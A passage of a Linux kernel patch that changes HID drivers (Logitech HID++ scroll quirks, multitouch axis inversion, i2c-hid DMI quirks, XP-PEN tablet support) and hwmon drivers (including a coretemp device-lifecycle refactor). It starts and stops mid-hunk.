+ 			hid_dbg(hidpp->hid_dev, "Detected HID++ 2.0 hi-res scrolling\n");
+ 		}
+ 	} else {
+-		struct hidpp_report response;
+-
+-		ret = hidpp_send_rap_command_sync(hidpp,
+-						  REPORT_ID_HIDPP_SHORT,
+-						  HIDPP_GET_REGISTER,
+-						  HIDPP_ENABLE_FAST_SCROLL,
+-						  NULL, 0, &response);
+-		if (!ret) {
++		/* We cannot detect fast scrolling support on HID++ 1.0 devices */
++		if (hidpp->quirks & HIDPP_QUIRK_HI_RES_SCROLL_1P0) {
+ 			hidpp->capabilities |= HIDPP_CAPABILITY_HIDPP10_FAST_SCROLL;
+ 			hid_dbg(hidpp->hid_dev, "Detected HID++ 1.0 fast scroll\n");
+ 		}
+@@ -4107,6 +4102,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	bool connected;
+ 	unsigned int connect_mask = HID_CONNECT_DEFAULT;
+ 	struct hidpp_ff_private_data data;
++	bool will_restart = false;
+ 
+ 	/* report_fixup needs drvdata to be set before we call hid_parse */
+ 	hidpp = devm_kzalloc(&hdev->dev, sizeof(*hidpp), GFP_KERNEL);
+@@ -4162,6 +4158,10 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			return ret;
+ 	}
+ 
++	if (hidpp->quirks & HIDPP_QUIRK_DELAYED_INIT ||
++	    hidpp->quirks & HIDPP_QUIRK_UNIFYING)
++		will_restart = true;
++
+ 	INIT_WORK(&hidpp->work, delayed_work_cb);
+ 	mutex_init(&hidpp->send_mutex);
+ 	init_waitqueue_head(&hidpp->wait);
+@@ -4176,7 +4176,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	 * Plain USB connections need to actually call start and open
+ 	 * on the transport driver to allow incoming data.
+ 	 */
+-	ret = hid_hw_start(hdev, 0);
++	ret = hid_hw_start(hdev, will_restart ? 0 : connect_mask);
+ 	if (ret) {
+ 		hid_err(hdev, "hw start failed\n");
+ 		goto hid_hw_start_fail;
+@@ -4213,6 +4213,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			hidpp->wireless_feature_index = 0;
+ 		else if (ret)
+ 			goto hid_hw_init_fail;
++		ret = 0;
+ 	}
+ 
+ 	if (connected && (hidpp->quirks & HIDPP_QUIRK_CLASS_WTP)) {
+@@ -4227,19 +4228,21 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 
+ 	hidpp_connect_event(hidpp);
+ 
+-	/* Reset the HID node state */
+-	hid_device_io_stop(hdev);
+-	hid_hw_close(hdev);
+-	hid_hw_stop(hdev);
++	if (will_restart) {
++		/* Reset the HID node state */
++		hid_device_io_stop(hdev);
++		hid_hw_close(hdev);
++		hid_hw_stop(hdev);
+ 
+-	if (hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT)
+-		connect_mask &= ~HID_CONNECT_HIDINPUT;
++		if (hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT)
++			connect_mask &= ~HID_CONNECT_HIDINPUT;
+ 
+-	/* Now export the actual inputs and hidraw nodes to the world */
+-	ret = hid_hw_start(hdev, connect_mask);
+-	if (ret) {
+-		hid_err(hdev, "%s:hid_hw_start returned error\n", __func__);
+-		goto hid_hw_start_fail;
++		/* Now export the actual inputs and hidraw nodes to the world */
++		ret = hid_hw_start(hdev, connect_mask);
++		if (ret) {
++			hid_err(hdev, "%s:hid_hw_start returned error\n", __func__);
++			goto hid_hw_start_fail;
++		}
+ 	}
+ 
+ 	if (hidpp->quirks & HIDPP_QUIRK_CLASS_G920) {
+@@ -4297,9 +4300,15 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH,
+ 		USB_DEVICE_ID_LOGITECH_T651),
+ 	  .driver_data = HIDPP_QUIRK_CLASS_WTP },
++	{ /* Mouse Logitech Anywhere MX */
++	  LDJ_DEVICE(0x1017), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
+ 	{ /* Mouse logitech M560 */
+ 	  LDJ_DEVICE(0x402d),
+ 	  .driver_data = HIDPP_QUIRK_DELAYED_INIT | HIDPP_QUIRK_CLASS_M560 },
++	{ /* Mouse Logitech M705 (firmware RQM17) */
++	  LDJ_DEVICE(0x101b), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
++	{ /* Mouse Logitech Performance MX */
++	  LDJ_DEVICE(0x101a), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
+ 	{ /* Keyboard logitech K400 */
+ 	  LDJ_DEVICE(0x4024),
+ 	  .driver_data = HIDPP_QUIRK_CLASS_K400 },
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 372cbdd223e09..e31be0cb8b850 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -71,6 +71,7 @@ MODULE_LICENSE("GPL");
+ #define MT_QUIRK_SEPARATE_APP_REPORT	BIT(19)
+ #define MT_QUIRK_FORCE_MULTI_INPUT	BIT(20)
+ #define MT_QUIRK_DISABLE_WAKEUP		BIT(21)
++#define MT_QUIRK_ORIENTATION_INVERT	BIT(22)
+ 
+ #define MT_INPUTMODE_TOUCHSCREEN	0x02
+ #define MT_INPUTMODE_TOUCHPAD		0x03
+@@ -1009,6 +1010,7 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			    struct mt_usages *slot)
+ {
+ 	struct input_mt *mt = input->mt;
++	struct hid_device *hdev = td->hdev;
+ 	__s32 quirks = app->quirks;
+ 	bool valid = true;
+ 	bool confidence_state = true;
+@@ -1086,6 +1088,10 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 		int orientation = wide;
+ 		int max_azimuth;
+ 		int azimuth;
++		int x;
++		int y;
++		int cx;
++		int cy;
+ 
+ 		if (slot->a != DEFAULT_ZERO) {
+ 			/*
+@@ -1104,6 +1110,9 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			if (azimuth > max_azimuth * 2)
+ 				azimuth -= max_azimuth * 4;
+ 			orientation = -azimuth;
++			if (quirks & MT_QUIRK_ORIENTATION_INVERT)
++				orientation = -orientation;
++
+ 		}
+ 
+ 		if (quirks & MT_QUIRK_TOUCH_SIZE_SCALING) {
+@@ -1115,10 +1124,23 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			minor = minor >> 1;
+ 		}
+ 
+-		input_event(input, EV_ABS, ABS_MT_POSITION_X, *slot->x);
+-		input_event(input, EV_ABS, ABS_MT_POSITION_Y, *slot->y);
+-		input_event(input, EV_ABS, ABS_MT_TOOL_X, *slot->cx);
+-		input_event(input, EV_ABS, ABS_MT_TOOL_Y, *slot->cy);
++		x = hdev->quirks & HID_QUIRK_X_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_X) - *slot->x :
++			*slot->x;
++		y = hdev->quirks & HID_QUIRK_Y_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_Y) - *slot->y :
++			*slot->y;
++		cx = hdev->quirks & HID_QUIRK_X_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_X) - *slot->cx :
++			*slot->cx;
++		cy = hdev->quirks & HID_QUIRK_Y_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_Y) - *slot->cy :
++			*slot->cy;
++
++		input_event(input, EV_ABS, ABS_MT_POSITION_X, x);
++		input_event(input, EV_ABS, ABS_MT_POSITION_Y, y);
++		input_event(input, EV_ABS, ABS_MT_TOOL_X, cx);
++		input_event(input, EV_ABS, ABS_MT_TOOL_Y, cy);
+ 		input_event(input, EV_ABS, ABS_MT_DISTANCE, !*slot->tip_state);
+ 		input_event(input, EV_ABS, ABS_MT_ORIENTATION, orientation);
+ 		input_event(input, EV_ABS, ABS_MT_PRESSURE, *slot->p);
+@@ -1735,6 +1757,15 @@ static int mt_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	if (id->vendor == HID_ANY_ID && id->product == HID_ANY_ID)
+ 		td->serial_maybe = true;
+ 
++
++	/* Orientation is inverted if the X or Y axes are
++	 * flipped, but normalized if both are inverted.
++	 */
++	if (hdev->quirks & (HID_QUIRK_X_INVERT | HID_QUIRK_Y_INVERT) &&
++	    !((hdev->quirks & HID_QUIRK_X_INVERT)
++	      && (hdev->quirks & HID_QUIRK_Y_INVERT)))
++		td->mtclass.quirks = MT_QUIRK_ORIENTATION_INVERT;
++
+ 	/* This allows the driver to correctly support devices
+ 	 * that emit events over several HID messages.
+ 	 */
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 5bc91f68b3747..66e64350f1386 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -1237,7 +1237,7 @@ EXPORT_SYMBOL_GPL(hid_quirks_exit);
+ static unsigned long hid_gets_squirk(const struct hid_device *hdev)
+ {
+ 	const struct hid_device_id *bl_entry;
+-	unsigned long quirks = 0;
++	unsigned long quirks = hdev->initial_quirks;
+ 
+ 	if (hid_match_id(hdev, hid_ignore_list))
+ 		quirks |= HID_QUIRK_IGNORE;
+diff --git a/drivers/hid/hid-uclogic-core.c b/drivers/hid/hid-uclogic-core.c
+index cfbbc39807a69..bfbb51f8b5beb 100644
+--- a/drivers/hid/hid-uclogic-core.c
++++ b/drivers/hid/hid-uclogic-core.c
+@@ -22,25 +22,6 @@
+ 
+ #include "hid-ids.h"
+ 
+-/* Driver data */
+-struct uclogic_drvdata {
+-	/* Interface parameters */
+-	struct uclogic_params params;
+-	/* Pointer to the replacement report descriptor. NULL if none. */
+-	__u8 *desc_ptr;
+-	/*
+-	 * Size of the replacement report descriptor.
+-	 * Only valid if desc_ptr is not NULL
+-	 */
+-	unsigned int desc_size;
+-	/* Pen input device */
+-	struct input_dev *pen_input;
+-	/* In-range timer */
+-	struct timer_list inrange_timer;
+-	/* Last rotary encoder state, or U8_MAX for none */
+-	u8 re_state;
+-};
+-
+ /**
+  * uclogic_inrange_timeout - handle pen in-range state timeout.
+  * Emulate input events normally generated when pen goes out of range for
+@@ -202,6 +183,7 @@ static int uclogic_probe(struct hid_device *hdev,
+ 	}
+ 	timer_setup(&drvdata->inrange_timer, uclogic_inrange_timeout, 0);
+ 	drvdata->re_state = U8_MAX;
++	drvdata->quirks = id->driver_data;
+ 	hid_set_drvdata(hdev, drvdata);
+ 
+ 	/* Initialize the device and retrieve interface parameters */
+@@ -529,8 +511,14 @@ static const struct hid_device_id uclogic_devices[] = {
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
++				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW),
++		.driver_data = UCLOGIC_MOUSE_FRAME_QUIRK | UCLOGIC_BATTERY_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
++				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW),
++		.driver_data = UCLOGIC_MOUSE_FRAME_QUIRK | UCLOGIC_BATTERY_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_STAR06) },
+ 	{ }
+diff --git a/drivers/hid/hid-uclogic-params.c b/drivers/hid/hid-uclogic-params.c
+index 3c5eea3df3288..0cc03c11ecc22 100644
+--- a/drivers/hid/hid-uclogic-params.c
++++ b/drivers/hid/hid-uclogic-params.c
+@@ -1222,6 +1222,11 @@ static int uclogic_params_ugee_v2_init_frame_mouse(struct uclogic_params *p)
+  */
+ static bool uclogic_params_ugee_v2_has_battery(struct hid_device *hdev)
+ {
++	struct uclogic_drvdata *drvdata = hid_get_drvdata(hdev);
++
++	if (drvdata->quirks & UCLOGIC_BATTERY_QUIRK)
++		return true;
++
+ 	/* The XP-PEN Deco LW vendor, product and version are identical to the
+ 	 * Deco L. The only difference reported by their firmware is the product
+ 	 * name. Add a quirk to support battery reporting on the wireless
+@@ -1298,6 +1303,7 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 				       struct hid_device *hdev)
+ {
+ 	int rc = 0;
++	struct uclogic_drvdata *drvdata;
+ 	struct usb_interface *iface;
+ 	__u8 bInterfaceNumber;
+ 	const int str_desc_len = 12;
+@@ -1316,6 +1322,7 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 		goto cleanup;
+ 	}
+ 
++	drvdata = hid_get_drvdata(hdev);
+ 	iface = to_usb_interface(hdev->dev.parent);
+ 	bInterfaceNumber = iface->cur_altsetting->desc.bInterfaceNumber;
+ 
+@@ -1382,6 +1389,9 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 	p.pen.subreport_list[0].id = UCLOGIC_RDESC_V1_FRAME_ID;
+ 
+ 	/* Initialize the frame interface */
++	if (drvdata->quirks & UCLOGIC_MOUSE_FRAME_QUIRK)
++		frame_type = UCLOGIC_PARAMS_FRAME_MOUSE;
++
+ 	switch (frame_type) {
+ 	case UCLOGIC_PARAMS_FRAME_DIAL:
+ 	case UCLOGIC_PARAMS_FRAME_MOUSE:
+@@ -1659,8 +1669,12 @@ int uclogic_params_init(struct uclogic_params *params,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L):
++	case VID_PID(USB_VENDOR_ID_UGEE,
++		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S):
++	case VID_PID(USB_VENDOR_ID_UGEE,
++		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW):
+ 		rc = uclogic_params_ugee_v2_init(&p, hdev);
+ 		if (rc != 0)
+ 			goto cleanup;
+diff --git a/drivers/hid/hid-uclogic-params.h b/drivers/hid/hid-uclogic-params.h
+index a97477c02ff82..b0e7f3807939b 100644
+--- a/drivers/hid/hid-uclogic-params.h
++++ b/drivers/hid/hid-uclogic-params.h
+@@ -19,6 +19,9 @@
+ #include <linux/usb.h>
+ #include <linux/hid.h>
+ 
++#define UCLOGIC_MOUSE_FRAME_QUIRK	BIT(0)
++#define UCLOGIC_BATTERY_QUIRK		BIT(1)
++
+ /* Types of pen in-range reporting */
+ enum uclogic_params_pen_inrange {
+ 	/* Normal reports: zero - out of proximity, one - in proximity */
+@@ -215,6 +218,27 @@ struct uclogic_params {
+ 	struct uclogic_params_frame frame_list[3];
+ };
+ 
++/* Driver data */
++struct uclogic_drvdata {
++	/* Interface parameters */
++	struct uclogic_params params;
++	/* Pointer to the replacement report descriptor. NULL if none. */
++	__u8 *desc_ptr;
++	/*
++	 * Size of the replacement report descriptor.
++	 * Only valid if desc_ptr is not NULL
++	 */
++	unsigned int desc_size;
++	/* Pen input device */
++	struct input_dev *pen_input;
++	/* In-range timer */
++	struct timer_list inrange_timer;
++	/* Last rotary encoder state, or U8_MAX for none */
++	u8 re_state;
++	/* Device quirks */
++	unsigned long quirks;
++};
++
+ /* Initialize a tablet interface and discover its parameters */
+ extern int uclogic_params_init(struct uclogic_params *params,
+ 				struct hid_device *hdev);
+diff --git a/drivers/hid/i2c-hid/i2c-hid-core.c b/drivers/hid/i2c-hid/i2c-hid-core.c
+index a9428b7f34a46..969f8eb086f02 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-core.c
++++ b/drivers/hid/i2c-hid/i2c-hid-core.c
+@@ -1035,6 +1035,10 @@ int i2c_hid_core_probe(struct i2c_client *client, struct i2chid_ops *ops,
+ 	hid->vendor = le16_to_cpu(ihid->hdesc.wVendorID);
+ 	hid->product = le16_to_cpu(ihid->hdesc.wProductID);
+ 
++	hid->initial_quirks = quirks;
++	hid->initial_quirks |= i2c_hid_get_dmi_quirks(hid->vendor,
++						      hid->product);
++
+ 	snprintf(hid->name, sizeof(hid->name), "%s %04X:%04X",
+ 		 client->name, (u16)hid->vendor, (u16)hid->product);
+ 	strscpy(hid->phys, dev_name(&client->dev), sizeof(hid->phys));
+@@ -1048,8 +1052,6 @@ int i2c_hid_core_probe(struct i2c_client *client, struct i2chid_ops *ops,
+ 		goto err_mem_free;
+ 	}
+ 
+-	hid->quirks |= quirks;
+-
+ 	return 0;
+ 
+ err_mem_free:
+diff --git a/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c b/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
+index 8e0f67455c098..210f17c3a0be0 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
++++ b/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
+@@ -10,8 +10,10 @@
+ #include <linux/types.h>
+ #include <linux/dmi.h>
+ #include <linux/mod_devicetable.h>
++#include <linux/hid.h>
+ 
+ #include "i2c-hid.h"
++#include "../hid-ids.h"
+ 
+ 
+ struct i2c_hid_desc_override {
+@@ -416,6 +418,28 @@ static const struct dmi_system_id i2c_hid_dmi_desc_override_table[] = {
+ 	{ }	/* Terminate list */
+ };
+ 
++static const struct hid_device_id i2c_hid_elan_flipped_quirks = {
++	HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8, USB_VENDOR_ID_ELAN, 0x2dcd),
++		HID_QUIRK_X_INVERT | HID_QUIRK_Y_INVERT
++};
++
++/*
++ * This list contains devices which have specific issues based on the system
++ * they're on and not just the device itself. The driver_data will have a
++ * specific hid device to match against.
++ */
++static const struct dmi_system_id i2c_hid_dmi_quirk_table[] = {
++	{
++		.ident = "DynaBook K50/FR",
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Dynabook Inc."),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "dynabook K50/FR"),
++		},
++		.driver_data = (void *)&i2c_hid_elan_flipped_quirks,
++	},
++	{ }	/* Terminate list */
++};
++
+ 
+ struct i2c_hid_desc *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name)
+ {
+@@ -450,3 +474,21 @@ char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 	*size = override->hid_report_desc_size;
+ 	return override->hid_report_desc;
+ }
++
++u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product)
++{
++	u32 quirks = 0;
++	const struct dmi_system_id *system_id =
++			dmi_first_match(i2c_hid_dmi_quirk_table);
++
++	if (system_id) {
++		const struct hid_device_id *device_id =
++				(struct hid_device_id *)(system_id->driver_data);
++
++		if (device_id && device_id->vendor == vendor &&
++		    device_id->product == product)
++			quirks = device_id->driver_data;
++	}
++
++	return quirks;
++}
+diff --git a/drivers/hid/i2c-hid/i2c-hid.h b/drivers/hid/i2c-hid/i2c-hid.h
+index 96c75510ad3f1..2c7b66d5caa0f 100644
+--- a/drivers/hid/i2c-hid/i2c-hid.h
++++ b/drivers/hid/i2c-hid/i2c-hid.h
+@@ -9,6 +9,7 @@
+ struct i2c_hid_desc *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name);
+ char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 					       unsigned int *size);
++u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product);
+ #else
+ static inline struct i2c_hid_desc
+ 		   *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name)
+@@ -16,6 +17,8 @@ static inline struct i2c_hid_desc
+ static inline char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 							     unsigned int *size)
+ { return NULL; }
++static inline u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product)
++{ return 0; }
+ #endif
+ 
+ /**
+diff --git a/drivers/hwmon/Kconfig b/drivers/hwmon/Kconfig
+index d3bccc8176c51..a5143d01b95f8 100644
+--- a/drivers/hwmon/Kconfig
++++ b/drivers/hwmon/Kconfig
+@@ -1508,7 +1508,7 @@ config SENSORS_NCT6775_CORE
+ config SENSORS_NCT6775
+ 	tristate "Platform driver for Nuvoton NCT6775F and compatibles"
+ 	depends on !PPC
+-	depends on ACPI_WMI || ACPI_WMI=n
++	depends on ACPI || ACPI=n
+ 	select HWMON_VID
+ 	select SENSORS_NCT6775_CORE
+ 	help
+diff --git a/drivers/hwmon/asus-ec-sensors.c b/drivers/hwmon/asus-ec-sensors.c
+index a901e4e33d81d..b4d65916b3c00 100644
+--- a/drivers/hwmon/asus-ec-sensors.c
++++ b/drivers/hwmon/asus-ec-sensors.c
+@@ -299,6 +299,7 @@ static const struct ec_board_info board_info_pro_art_x570_creator_wifi = {
+ 	.sensors = SENSOR_SET_TEMP_CHIPSET_CPU_MB | SENSOR_TEMP_VRM |
+ 		SENSOR_TEMP_T_SENSOR | SENSOR_FAN_CPU_OPT |
+ 		SENSOR_CURR_CPU | SENSOR_IN_CPU_CORE,
++	.mutex_path = ASUS_HW_ACCESS_MUTEX_ASMX,
+ 	.family = family_amd_500_series,
+ };
+ 
+diff --git a/drivers/hwmon/coretemp.c b/drivers/hwmon/coretemp.c
+index 9bee4d33fbdf0..baaf8af4cb443 100644
+--- a/drivers/hwmon/coretemp.c
++++ b/drivers/hwmon/coretemp.c
+@@ -550,66 +550,49 @@ static void coretemp_remove_core(struct platform_data *pdata, int indx)
+ 		ida_free(&pdata->ida, indx - BASE_SYSFS_ATTR_NO);
+ }
+ 
+-static int coretemp_probe(struct platform_device *pdev)
++static int coretemp_device_add(int zoneid)
+ {
+-	struct device *dev = &pdev->dev;
++	struct platform_device *pdev;
+ 	struct platform_data *pdata;
++	int err;
+ 
+ 	/* Initialize the per-zone data structures */
+-	pdata = devm_kzalloc(dev, sizeof(struct platform_data), GFP_KERNEL);
++	pdata = kzalloc(sizeof(*pdata), GFP_KERNEL);
+ 	if (!pdata)
+ 		return -ENOMEM;
+ 
+-	pdata->pkg_id = pdev->id;
++	pdata->pkg_id = zoneid;
+ 	ida_init(&pdata->ida);
+-	platform_set_drvdata(pdev, pdata);
+ 
+-	pdata->hwmon_dev = devm_hwmon_device_register_with_groups(dev, DRVNAME,
+-								  pdata, NULL);
+-	return PTR_ERR_OR_ZERO(pdata->hwmon_dev);
+-}
+-
+-static int coretemp_remove(struct platform_device *pdev)
+-{
+-	struct platform_data *pdata = platform_get_drvdata(pdev);
+-	int i;
++	pdev = platform_device_alloc(DRVNAME, zoneid);
++	if (!pdev) {
++		err = -ENOMEM;
++		goto err_free_pdata;
++	}
+ 
+-	for (i = MAX_CORE_DATA - 1; i >= 0; --i)
+-		if (pdata->core_data[i])
+-			coretemp_remove_core(pdata, i);
++	err = platform_device_add(pdev);
++	if (err)
++		goto err_put_dev;
+ 
+-	ida_destroy(&pdata->ida);
++	platform_set_drvdata(pdev, pdata);
++	zone_devices[zoneid] = pdev;
+ 	return 0;
+-}
+ 
+-static struct platform_driver coretemp_driver = {
+-	.driver = {
+-		.name = DRVNAME,
+-	},
+-	.probe = coretemp_probe,
+-	.remove = coretemp_remove,
+-};
++err_put_dev:
++	platform_device_put(pdev);
++err_free_pdata:
++	kfree(pdata);
++	return err;
++}
+ 
+-static struct platform_device *coretemp_device_add(unsigned int cpu)
++static void coretemp_device_remove(int zoneid)
+ {
+-	int err, zoneid = topology_logical_die_id(cpu);
+-	struct platform_device *pdev;
+-
+-	if (zoneid < 0)
+-		return ERR_PTR(-ENOMEM);
+-
+-	pdev = platform_device_alloc(DRVNAME, zoneid);
+-	if (!pdev)
+-		return ERR_PTR(-ENOMEM);
+-
+-	err = platform_device_add(pdev);
+-	if (err) {
+-		platform_device_put(pdev);
+-		return ERR_PTR(err);
+-	}
++	struct platform_device *pdev = zone_devices[zoneid];
++	struct platform_data *pdata = platform_get_drvdata(pdev);
+ 
+-	zone_devices[zoneid] = pdev;
+-	return pdev;
++	ida_destroy(&pdata->ida);
++	kfree(pdata);
++	platform_device_unregister(pdev);
+ }
+ 
+ static int coretemp_cpu_online(unsigned int cpu)
+@@ -633,7 +616,10 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 	if (!cpu_has(c, X86_FEATURE_DTHERM))
+ 		return -ENODEV;
+ 
+-	if (!pdev) {
++	pdata = platform_get_drvdata(pdev);
++	if (!pdata->hwmon_dev) {
++		struct device *hwmon;
++
+ 		/* Check the microcode version of the CPU */
+ 		if (chk_ucode_version(cpu))
+ 			return -EINVAL;
+@@ -644,9 +630,11 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 		 * online. So, initialize per-pkg data structures and
+ 		 * then bring this core online.
+ 		 */
+-		pdev = coretemp_device_add(cpu);
+-		if (IS_ERR(pdev))
+-			return PTR_ERR(pdev);
++		hwmon = hwmon_device_register_with_groups(&pdev->dev, DRVNAME,
++							  pdata, NULL);
++		if (IS_ERR(hwmon))
++			return PTR_ERR(hwmon);
++		pdata->hwmon_dev = hwmon;
+ 
+ 		/*
+ 		 * Check whether pkgtemp support is available.
+@@ -656,7 +644,6 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 			coretemp_add_core(pdev, cpu, 1);
+ 	}
+ 
+-	pdata = platform_get_drvdata(pdev);
+ 	/*
+ 	 * Check whether a thread sibling is already online. If not add the
+ 	 * interface for this CPU core.
+@@ -675,18 +662,14 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	struct temp_data *tdata;
+ 	int i, indx = -1, target;
+ 
+-	/*
+-	 * Don't execute this on suspend as the device remove locks
+-	 * up the machine.
+-	 */
++	/* No need to tear down any interfaces for suspend */
+ 	if (cpuhp_tasks_frozen)
+ 		return 0;
+ 
+ 	/* If the physical CPU device does not exist, just return */
+-	if (!pdev)
+-		return 0;
+-
+ 	pd = platform_get_drvdata(pdev);
++	if (!pd->hwmon_dev)
++		return 0;
+ 
+ 	for (i = 0; i < NUM_REAL_CORES; i++) {
+ 		if (pd->cpu_map[i] == topology_core_id(cpu)) {
+@@ -718,13 +701,14 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	}
+ 
+ 	/*
+-	 * If all cores in this pkg are offline, remove the device. This
+-	 * will invoke the platform driver remove function, which cleans up
+-	 * the rest.
++	 * If all cores in this pkg are offline, remove the interface.
+ 	 */
++	tdata = pd->core_data[PKG_SYSFS_ATTR_NO];
+ 	if (cpumask_empty(&pd->cpumask)) {
+-		zone_devices[topology_logical_die_id(cpu)] = NULL;
+-		platform_device_unregister(pdev);
++		if (tdata)
++			coretemp_remove_core(pd, PKG_SYSFS_ATTR_NO);
++		hwmon_device_unregister(pd->hwmon_dev);
++		pd->hwmon_dev = NULL;
+ 		return 0;
+ 	}
+ 
+@@ -732,7 +716,6 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	 * Check whether this core is the target for the package
+ 	 * interface. We need to assign it to some other cpu.
+ 	 */
+-	tdata = pd->core_data[PKG_SYSFS_ATTR_NO];
+ 	if (tdata && tdata->cpu == cpu) {
+ 		target = cpumask_first(&pd->cpumask);
+ 		mutex_lock(&tdata->update_lock);
+@@ -751,7 +734,7 @@ static enum cpuhp_state coretemp_hp_online;
+ 
+ static int __init coretemp_init(void)
+ {
+-	int err;
++	int i, err;
+ 
+ 	/*
+ 	 * CPUID.06H.EAX[0] indicates whether the CPU has thermal
+@@ -767,20 +750,22 @@ static int __init coretemp_init(void)
+ 	if (!zone_devices)
+ 		return -ENOMEM;
+ 
+-	err = platform_driver_register(&coretemp_driver);
+-	if (err)
+-		goto outzone;
++	for (i = 0; i < max_zones; i++) {
++		err = coretemp_device_add(i);
++		if (err)
++			goto outzone;
++	}
+ 
+ 	err = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "hwmon/coretemp:online",
+ 				coretemp_cpu_online, coretemp_cpu_offline);
+ 	if (err < 0)
+-		goto outdrv;
++		goto outzone;
+ 	coretemp_hp_online = err;
+ 	return 0;
+ 
+-outdrv:
+-	platform_driver_unregister(&coretemp_driver);
+ outzone:
++	while (i--)
++		coretemp_device_remove(i);
+ 	kfree(zone_devices);
+ 	return err;
+ }
+@@ -788,8 +773,11 @@ module_init(coretemp_init)
+ 
+ static void __exit coretemp_exit(void)
+ {
++	int i;
++
+ 	cpuhp_remove_state(coretemp_hp_online);
+-	platform_driver_unregister(&coretemp_driver);
++	for (i = 0; i < max_zones; i++)
++		coretemp_device_remove(i);
+ 	kfree(zone_devices);
+ }
+ module_exit(coretemp_exit)
+diff --git a/drivers/hwmon/ftsteutates.c b/drivers/hwmon/ftsteutates.c
+index f5b8e724a8ca1..ffa0bb3648775 100644
+--- a/drivers/hwmon/ftsteutates.c
++++ b/drivers/hwmon/ftsteutates.c
+@@ -12,6 +12,7 @@
+ #include <linux/i2c.h>
+ #include <linux/init.h>
+ #include <linux/jiffies.h>
++#include <linux/math.h>
+ #include <linux/module.h>
+ #include <linux/mutex.h>
+ #include <linux/slab.h>
+@@ -347,13 +348,15 @@ static ssize_t in_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->volt[index]);
